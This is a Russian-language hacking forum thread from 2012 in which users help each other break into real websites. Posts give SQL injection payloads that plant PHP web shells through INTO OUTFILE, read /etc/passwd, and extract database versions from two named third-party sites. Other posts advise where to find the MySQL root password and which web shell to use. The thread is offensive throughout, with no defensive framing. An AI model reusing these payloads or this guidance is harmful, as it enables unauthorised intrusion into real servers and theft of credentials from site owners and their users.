Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
  2. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    MaxFast я немогу разобраться,как залить експлоит и запустить.
     
  3. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    помогите составить запрос заливки файла(имею file_priv=Y)
    есть уязвимый пхп скрипт(sql inj)
    id=x
    структура запросса:
    SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

    При запросе:
    id=9999+union+select+1,2,3--
    ошибка:
    SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed
    вывод в 1 столбец
    пишу
    9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается
    Как правильно составить запрос?
     
  4. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    может кавычки фильтруются?
    у меня так работало вроде:
    PHP:
    select '<?php eval($_REQUEST[cmd]);  ?>' into outfile '/home/cdut/domains/sss/htdocs/phpmyadmin/1.php'
     
    #20984 pirat0, 18 Aug 2012
    Last edited: 18 Aug 2012
  5. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    раскрутил double blind inj на 1 сайтике, сбрутил имена всех доступных баз данных, среди них есть и mysql. file_priv соответственно тоже есть. Пути никакие вообще не знаю, локального инклюда нету, скан портов на предмет сервака баз данных ничего хорошего не сказал.

    Что сделать можно, кроме как брутить путь к конфигурационным файлам апача? А то что-то нет никакого желания брутить строки через двойную слепоту...
     
  6. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    UP
    ковычки не фильтруются
    9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*
    файл не записывается и вылазит ошибка
    QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!


    Запрос:
    9999+select+'<?php%20eval($_REQUEST[cmd]);%20?>'+into+outfile+'/х/х/х/х/х/х/1.php'--+
    Тоже файл не записывается и ошибка:
    QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!
     
  7. antiaudomain

    antiaudomain Banned

    Joined:
    19 May 2011
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    magic qoutes may be?
    'asd' просто отображает?
     
  8. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    запрос
    9999+union+select+'1',2,3--+
    выводит в столбец просто 1
    думаю ,что mq=off т.к.
    запрос 9999+union+select+LOAD_FILE('/etc/passwd'),2,3--+ выполняется успешно и выводится этот файл.
    Я вот подумал может нету прав у юзера на котором мускул запушен на запись в диру которую я ему подсовываю?как это можно провирить проверить?и как действовать в таком случае?
    ЧТО Я ИМЕЮ:
    1.Доступ ко всем бд серва(там есть Пхпадмин и таблица psa-похоже ,что это типо cpanel ,но адрес их адреса найти не удалось ровно также как и определить хостинг сайта)
    2.Соответственно могу читать файлы.
    3.На борту есть форум пхпбб, но в его дб не удалось обнаружить таблиц с юзерами(видать кудато в другое место пишутся)пытался прочитать скрипт реги ,но куда пишутся юзеры так и не обнаружил.
     
  9. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    "blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.
     
    _________________________
  10. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Да ,но в них как правило запрет на исполнение пхп скриптов
     
  11. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    А такую уязвимость вообще реально раскрутить? https://p-on.ru/admin/
    и

    http://www.alarmtrade.ru/search/?search=UNION+SELECT+ids+FROM+pages+WHER'


    Хотелось бы знать как.
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    по поводу p-on.ru:
    в поле логин: ' or(1)group by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))#)
    message: Duplicate entry '5.0.45-community-nt' for key 1

    по поводу: alarmtrade.ru:
    Code:
    http://www.alarmtrade.ru/search/?search='or(1)group/**/by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
    Duplicate entry '5.1.58' for key 'group_key'
     
    _________________________
    2 people like this.
  13. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Как достать пароль от mysql если есть доступ к корневой папке "/" ? Нашел там папку с апачем, но в нем по моему нету логин и пасс от mysql. В конфигах сайта через который лился только пользователь привязанный к бд сайта(( Там есть еще сайты, но смотреть каждый в лом.
    И еще, как можно увидеть всю структуру сервера если залит шелл? Т.е все папки и под папки. Юзаю шелл 404

    UPD. Нашел папку mysql, но зайти в нее не дает, есть ли варианты зайти в нее?
     
    #20993 WendM, 21 Aug 2012
    Last edited: 21 Aug 2012
  14. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    Юзать root. Прокачай систему до 20 левела с помощью сплоита.
     
    _________________________
  15. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    ?? Можно подробней
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вообще-то самый высокий уровень нулевой, а никак не 20

    по сабжу, пароль от мюскл можно узнать в трех случаях:
    имея рута на сервере и как правило пароль лежит тут: /root/.my.cnf
    имея логин и пароль пользователя который не ограничен доступом в mysql.user, достал хеш рута => брут => профит
    найти пароль в конфигах, логах, процессах
     
    _________________________
  17. Teratex

    Teratex New Member

    Joined:
    13 Mar 2012
    Messages:
    28
    Likes Received:
    3
    Reputations:
    5
    WendM
    Не знаю как в шеле 404, но в wso есть возможность просто читать конкретный файл, если знаешь где папка MySQL то там же и конфиг, можешь прочитать конфиг на прямую.
    НО нужно еще пасс расшифровать.
    Или как писали если есть возможность заюзать сплоит и повысить права
     
  18. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    ;)
     
  19. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Ребята, вы так и не дали ответ на мой еще один вопрос. В каком шеле можно посмотреть дерево каталогов?, т.е все папки и под папки
     
  20. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    WSO.
     
Thread Status:
Not open for further replies.